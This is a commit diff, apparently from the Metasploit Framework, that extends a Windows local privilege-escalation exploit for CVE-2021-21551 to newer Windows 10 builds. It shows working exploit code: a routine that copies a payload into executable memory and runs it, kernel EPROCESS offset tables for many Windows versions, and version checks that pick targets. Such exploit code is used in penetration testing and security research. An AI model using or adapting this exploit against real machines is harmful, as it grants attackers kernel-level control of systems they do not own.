Land #15216, Fix targeting for CVE-2021-21551
Merge branch 'land-15216' into upstream-master
This commit is contained in:
commit
8e1391f098
Binary file not shown.
|
@ -7,7 +7,7 @@ read and write kernel-mode memory.
|
|||
* Windows 7 SP0 x64
|
||||
* Windows 7 SP1 x64
|
||||
* Windows 8.1 x64
|
||||
* Windows 10 x64 v1607 - v2009 (20H2)
|
||||
* Windows 10 x64 v1607 - 21H1 (builds 14393 - 19043)
|
||||
* Windows Server 2016 x64
|
||||
* Windows Server 2019 x64
|
||||
|
||||
|
|
|
@ -8,6 +8,8 @@ fNtQuerySystemInformation NtQuerySystemInformation = NULL;
|
|||
fRtlGetNtVersionNumbers RtlGetNtVersionNumbers = NULL;
|
||||
|
||||
void ExecutePayload(PMSF_PAYLOAD pMsfPayload) {
|
||||
if (!pMsfPayload)
|
||||
return;
|
||||
PVOID pPayload = VirtualAlloc(NULL, pMsfPayload->dwSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (!pPayload)
|
||||
return;
|
||||
|
@ -35,6 +37,7 @@ BOOL ResolveRequirements(void) {
|
|||
DWORD dwMajor, dwMinor, dwBuild;
|
||||
RtlGetNtVersionNumbers(&dwMajor, &dwMinor, &dwBuild);
|
||||
dwBuild = LOWORD(dwBuild);
|
||||
dprintf("[*] Windows version: %u.%u.%u", dwMajor, dwMinor, dwBuild);
|
||||
|
||||
if ((dwMajor == 6) && (dwMinor == 1) && (dwBuild == 7600)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin7Sp0;
|
||||
|
@ -45,32 +48,29 @@ BOOL ResolveRequirements(void) {
|
|||
else if ((dwMajor == 6) && (dwMinor == 3) && (dwBuild == 9600)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin8p1;
|
||||
}
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 14393)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1607;
|
||||
}
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 15063)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1703;
|
||||
}
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 16299)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1709;
|
||||
}
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 17134)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1803;
|
||||
}
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 17763)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1809;
|
||||
}
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 18362)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1903;
|
||||
}
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 18362)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1903;
|
||||
}
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 19041)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v2004;
|
||||
}
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 18362)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1903;
|
||||
/* targets for Windows 10 v1607 - 21H1 */
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild >= 14393) && (dwBuild <= 19043)) {
|
||||
if ((dwBuild < 15063)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1607;
|
||||
}
|
||||
else if ((dwBuild < 16299)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1703;
|
||||
}
|
||||
else if ((dwBuild < 17134)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1709;
|
||||
}
|
||||
else if ((dwBuild < 17763)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1803;
|
||||
}
|
||||
else if ((dwBuild < 18362)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1809;
|
||||
}
|
||||
else if ((dwBuild < 19041)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1903;
|
||||
}
|
||||
else if ((dwBuild <= 19043)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v2004;
|
||||
}
|
||||
}
|
||||
else {
|
||||
return FALSE;
|
||||
|
|
|
@ -47,9 +47,9 @@ const static EPROCESS_OFFSETS EprocessOffsetsWin8p1 = { 0x2e8, 0x348, 0x2e0 };
|
|||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1607 = { 0x2f0, 0x358, 0x2e8 };
|
||||
/* Windows 10 v1703 (10.0.15063) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1703%20Redstone%202%20(Creators%20Update)/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1703 = { 0x2e8, 0x358, 0x2e0 };
|
||||
/* Windows 10 v1709 (10.0.16299) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1709%20Redstone%203%20(Fall%20Creators%20Update */
|
||||
/* Windows 10 v1709 (10.0.16299) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1709%20Redstone%203%20(Fall%20Creators%20Update)/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1709 = { 0x2e8, 0x358, 0x2e0 };
|
||||
/* Windows 10 v1803 (10.0.17134) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1803%20Redstone%204%20(Spring%20Creators%20Update)/_EPROCESS*/
|
||||
/* Windows 10 v1803 (10.0.17134) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1803%20Redstone%204%20(Spring%20Creators%20Update)/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1803 = { 0x2e8, 0x358, 0x2e0 };
|
||||
/* Windows 10 v1809 (10.0.17763) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1809%20Redstone%205%20(October%20Update)/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1809 = { 0x2e8, 0x358, 0x2e0 };
|
||||
|
@ -57,9 +57,9 @@ const static EPROCESS_OFFSETS EprocessOffsetsWin10v1809 = { 0x2e8, 0x358, 0x2e0
|
|||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1903 = { 0x2f0, 0x360, 0x2e8 };
|
||||
/* Windows 10 v1909 (10.0.18362) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1909%2019H2%20(November%202019%20Update)/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1909 = { 0x2f0, 0x360, 0x2e8 };
|
||||
/* Windows 10 v2004 (10.0.19041) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/2004%2020H1%20(May%202020%20Update)/_EPROCESS */
|
||||
/* Windows 10 v2004 / 20H1 (10.0.19041) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/2004%2020H1%20(May%202020%20Update)/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v2004 = { 0x448, 0x4b8, 0x440 };
|
||||
/* Windows 10 v2009 (10.0.19041) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/2009%2020H2%20(October%202020%20Update)/_EPROCESS */
|
||||
/* Windows 10 v2009 / 20H2 (10.0.19041) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/2009%2020H2%20(October%202020%20Update)/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v2009 = { 0x448, 0x4b8, 0x440 };
|
||||
#endif
|
||||
|
||||
|
|
|
@ -87,8 +87,8 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
|
||||
return true if sysinfo_value =~ /Windows 7/ && ((build_num == 7600) || (build_num == 7601))
|
||||
return true if sysinfo_value =~ /Windows 8\.1/ && (build_num == 9600)
|
||||
return true if sysinfo_value =~ /Windows 10/ && (build_num >= 14393 && build_num <= 19042)
|
||||
return true if sysinfo_value =~ /Windows 2016/ && (build_num >= 14393 && build_num <= 19042)
|
||||
return true if sysinfo_value =~ /Windows 10/ && (build_num >= 14393 && build_num <= 19043)
|
||||
return true if sysinfo_value =~ /Windows 2016/ && (build_num >= 14393 && build_num <= 19043)
|
||||
|
||||
false
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue